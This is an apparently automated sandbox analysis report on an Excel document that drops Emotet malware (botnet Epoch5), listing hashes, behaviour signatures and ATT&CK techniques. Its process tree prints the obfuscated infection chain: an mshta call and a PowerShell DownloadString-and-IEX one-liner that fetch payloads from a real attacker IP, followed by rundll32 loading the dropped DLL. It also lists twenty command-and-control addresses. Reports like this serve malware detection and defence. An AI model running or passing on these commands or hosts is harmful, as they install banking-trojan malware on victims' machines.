Analysis

  • max time kernel
    127s
  • max time network
    161s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 03:22

General

  • Target

    tmpp4xwdyxv.xls

  • Size

    36KB

  • MD5

    dbfeb8dae859888e64d607db25deb618

  • SHA1

    73b1e163f2465fad2c15b29426db5adb671a4617

  • SHA256

    db2f94ff44db439e7a8d61e8aa10a44edec79468991702309757483734516058

  • SHA512

    dbdd68f0d75999c955bf1fa2af330759fd250535afd6e93dff8438e471b1e74c43fdb01fd09cbe6bba57692b9848ca34dd5db947d97aa95f1f997c9b963d146d

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/oo/aa/se.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/oo/aa/se.png

Extracted

Family

emotet

Botnet

Epoch5

C2

159.69.43.124:8080

45.79.80.198:443

207.148.81.119:8080

128.199.192.135:8080

118.98.72.86:443

217.182.143.207:443

168.197.250.14:80

116.124.128.206:8080

78.46.73.125:443

185.148.168.15:8080

195.154.146.35:443

85.214.67.203:8080

194.9.172.107:8080

59.148.253.194:443

210.57.209.142:8080

54.38.242.185:443

195.77.239.39:8080

159.69.237.188:443

104.131.62.48:8080

62.171.178.147:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\tmpp4xwdyxv.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2620
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/oo/aa/s^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2788
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/oo/aa/se.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:3488
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/oo/aa/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1648
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1896
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:984
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:2396
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Dzfltkshrlhx\regw.ufa",MbVPRPtWaOUK
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3452
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Dzfltkshrlhx\regw.ufa",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2184
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 3488 -s 1660
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:708

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    1fd4499e393eb2bae9ff1d58d4669c06

    SHA1

    dfa462ad52abf4edcc904edc3943e1573905bcbd

    SHA256

    a65662042685f530da46a94c8dc4b33248e682de80804764516957738d6381aa

    SHA512

    8a9aab40441cc91cbf5b70d69456d41ef2420f98c22ef7842edbf3088f62468f0b3fcb9ab4bd784c33ef908725e3db4e15a02814507f7a9b5c0e1c289dc94663

  • \ProgramData\QWER.dll
    MD5

    1fd4499e393eb2bae9ff1d58d4669c06

    SHA1

    dfa462ad52abf4edcc904edc3943e1573905bcbd

    SHA256

    a65662042685f530da46a94c8dc4b33248e682de80804764516957738d6381aa

    SHA512

    8a9aab40441cc91cbf5b70d69456d41ef2420f98c22ef7842edbf3088f62468f0b3fcb9ab4bd784c33ef908725e3db4e15a02814507f7a9b5c0e1c289dc94663

  • \ProgramData\QWER.dll
    MD5

    1fd4499e393eb2bae9ff1d58d4669c06

    SHA1

    dfa462ad52abf4edcc904edc3943e1573905bcbd

    SHA256

    a65662042685f530da46a94c8dc4b33248e682de80804764516957738d6381aa

    SHA512

    8a9aab40441cc91cbf5b70d69456d41ef2420f98c22ef7842edbf3088f62468f0b3fcb9ab4bd784c33ef908725e3db4e15a02814507f7a9b5c0e1c289dc94663

  • memory/984-618-0x0000000004E01000-0x0000000004E24000-memory.dmp
    Filesize

    140KB

  • memory/1648-291-0x000002A341C20000-0x000002A341C42000-memory.dmp
    Filesize

    136KB

  • memory/1648-471-0x000002A341C80000-0x000002A359E00000-memory.dmp
    Filesize

    385.5MB

  • memory/1648-615-0x000002A341C80000-0x000002A359E00000-memory.dmp
    Filesize

    385.5MB

  • memory/1648-363-0x000002A35A340000-0x000002A35A37C000-memory.dmp
    Filesize

    240KB

  • memory/1648-388-0x000002A341C80000-0x000002A359E00000-memory.dmp
    Filesize

    385.5MB

  • memory/1648-420-0x000002A35A400000-0x000002A35A476000-memory.dmp
    Filesize

    472KB

  • memory/2184-648-0x00000000031D0000-0x00000000031F7000-memory.dmp
    Filesize

    156KB

  • memory/2396-624-0x00000000054E0000-0x0000000005507000-memory.dmp
    Filesize

    156KB

  • memory/2396-626-0x00000000055C0000-0x00000000055E7000-memory.dmp
    Filesize

    156KB

  • memory/2396-647-0x0000000005A10000-0x0000000005A37000-memory.dmp
    Filesize

    156KB

  • memory/2396-632-0x0000000005860000-0x0000000005887000-memory.dmp
    Filesize

    156KB

  • memory/2396-630-0x0000000005800000-0x0000000005827000-memory.dmp
    Filesize

    156KB

  • memory/2396-628-0x00000000057A0000-0x00000000057C7000-memory.dmp
    Filesize

    156KB

  • memory/2620-119-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/2620-131-0x00007FFB00DC0000-0x00007FFB00DD0000-memory.dmp
    Filesize

    64KB

  • memory/2620-118-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/2620-120-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/2620-121-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/2620-124-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/2620-132-0x00007FFB00DC0000-0x00007FFB00DD0000-memory.dmp
    Filesize

    64KB

  • memory/2620-674-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/2620-675-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/2620-676-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/2620-677-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/3452-644-0x00000000002A0000-0x00000000002C7000-memory.dmp
    Filesize

    156KB